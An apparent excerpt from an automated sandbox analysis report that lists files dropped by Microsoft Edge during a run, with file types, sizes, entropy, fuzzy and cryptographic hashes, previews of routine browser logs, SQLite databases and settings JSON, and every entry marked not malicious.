                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.804 47c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-04:59:16.806 47c Recovering log #3.2025/01/09-04:59:16.812 47c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):323
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.256870833267779
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJIBGi+q2Pwkn23oH+TcwtpIFUtJbJIDjZZmwPbJIWb9VkwOwkn23oH+Tcwt7:72wi+vYfYebmFUt4D9/yWb9V5JfYebaQ
                                                                                                                                                                                                                                                                                                                  MD5:3DD2B4C56AD762FDFBC008C452863B0A
                                                                                                                                                                                                                                                                                                                  SHA1:42BCFBC44001702F6577310C9C61ABC2AA354439
                                                                                                                                                                                                                                                                                                                  SHA-256:04E7F21667DA2B11B399884764CB8AB4103E2F45661DAD18E3BB46EF2AA61294
                                                                                                                                                                                                                                                                                                                  SHA-512:21D8C601D2FDFCA5C41461FD9F74DA1D3CFA993BEAA5E9CAF445F0787CF7093E06A18B8BC615D78B635529A3772EE5FB5A92B662229718F20020633F616BABB8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.804 47c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-04:59:16.806 47c Recovering log #3.2025/01/09-04:59:16.812 47c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0671890745553332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTNnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYmcDn6:QrzWMffxnzkkqtXnTK+hNH+5EVumg
                                                                                                                                                                                                                                                                                                                  MD5:7AF64EAF9078C14DEA4E95EC0B3D4D82
                                                                                                                                                                                                                                                                                                                  SHA1:EF8FF9322AF503147ED8DE89C4C112E99E71E60E
                                                                                                                                                                                                                                                                                                                  SHA-256:BE3A8947800CDE9359470228186EA1EEA5629F94C6E833E862E2DB9820E9D9E1
                                                                                                                                                                                                                                                                                                                  SHA-512:4B96C72827847DC3108D09D9E782017274AB20FAD9F6F4EAB42EA55EDA3B8A6269991E74CF21507FB5CEF4453B53F9D2F51C4AB077380E2CAC9FF395380EF943
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46631937032817805
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LJvQnWu9:v7doKsKuKZKlZNmu46yjx0L2Wg
                                                                                                                                                                                                                                                                                                                  MD5:23FA98D9D8C2B5F75EC008A3C5B605D6
                                                                                                                                                                                                                                                                                                                  SHA1:D05865D090B1FE222BC2D02BDEF346F2FF6908B7
                                                                                                                                                                                                                                                                                                                  SHA-256:A66C72CBEB0839D39BAC96A58D255E8CF9A93DA20149B4170A3DD7F55BB6B53B
                                                                                                                                                                                                                                                                                                                  SHA-512:960004D9A3EDE4C4FAAD7206DB759654788F835BC7D4B2B4556E9151917E4F5643613D6F08D43387351837B25B3F55F4E21D2231CFCA931B93B8D97B75BA46CB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17973), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):17974
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.458771693962091
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HX9iiUTPhJwp+Npc6XXupUPQwi6:s1cJuHHXgap+Npc6X+pUYm
                                                                                                                                                                                                                                                                                                                  MD5:43954F35A9A1048A126CC9BE4E07B7DD
                                                                                                                                                                                                                                                                                                                  SHA1:DB8043C8095410BA27EF20E0E5DF0CAF422BC960
                                                                                                                                                                                                                                                                                                                  SHA-256:969FE928FEF63DA433452811CA9DAF47990C2772FEF2F4EA04D2B2A057AD0B52
                                                                                                                                                                                                                                                                                                                  SHA-512:C83705E0800E694E6B14DC9F888D88E6B4072415ECC8BF928A921A61725C58F69021E1353FC4B578DA649D3AD957066C71A0579A36DDCB03C21B8CBDCBAFCFE3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                                                                                                                  MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                                                                                                                  SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                                                                                                                  SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                                                                                                                  SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08675760979269978
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:GEl/d7TY4El/d7TAXJ9XHl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/UnnoiWrL:btdvxEtdvMFnnnnnnnnnnnpwE
                                                                                                                                                                                                                                                                                                                  MD5:176BACD1C090A06DB09E986DF135B45F
                                                                                                                                                                                                                                                                                                                  SHA1:49D4BA2EB06A752A863104B50791F96814360F09
                                                                                                                                                                                                                                                                                                                  SHA-256:81D191934786299DB5355A3E30ADF752A595ACE8B983731B3C3C43B53A8073B5
                                                                                                                                                                                                                                                                                                                  SHA-512:62E33CDEAEE0EC4311A8441A0C92379548C5AB2B4855320C76E9CBD1986318533A40FC2815D0693688ABBEC5B5A527CF4CF25A47A604EDBDBC30FD3E9110C06F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..-.............<........?.2...3..[.*.Nq......C%..-.............<........?.2...3..[.*.Nq......C%........8...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):247232
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8293756038318639
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:HcRzV9kv17QCNOS6k0M42RQ1OS8v8QyxyLZyCykNy7xyVl:3i7a
                                                                                                                                                                                                                                                                                                                  MD5:3A67B8B857B6C3B6B822AEF345A799AC
                                                                                                                                                                                                                                                                                                                  SHA1:7DA6411A97BDD1D2DC76BEA43A2CE4129D35C542
                                                                                                                                                                                                                                                                                                                  SHA-256:9986F314C715E0910CAD558588DC881D8E577D1D222846549094C855F079201A
                                                                                                                                                                                                                                                                                                                  SHA-512:AF48342372EF7AF55CE37F357C50C085D0B4081CA2B70F1FAC133FAE10A56D433FCDBA3430E3D7E9E67CB6F33769E4C835027E0738224C3AD0185BD0BC99AA3E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:7....-............[.*.Nq.B...yf...........[.*.Nq...o...]................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):155
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.304843117213832
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:VVXntjQPEnjQDWPFl3seGKT9rcQ6xlaQYrOtlTxotl:/XntM+lPFl3sedhO9YrOu
                                                                                                                                                                                                                                                                                                                  MD5:E5ED6298D8B9009BAABA05FC7F3CEF54
                                                                                                                                                                                                                                                                                                                  SHA1:91B17479326708BA034D6CE550E1A92FC1208782
                                                                                                                                                                                                                                                                                                                  SHA-256:9B41E2761E2A1BF6D960C5DD335AF673A6981A962E176B1D88B4937C57A36BDE
                                                                                                                                                                                                                                                                                                                  SHA-512:CDF1B7C3CD70548065AC17B0D59EDAB906CDBA18B4A37E43F62855BFD23D7B2A0C7E33F13C8BE7C40794A5068BC7E2AFFA093D211A3CF2340986E3EE0B64047B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...15..;0................39_config..........6.....n ....1u}.=...............u}.=...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
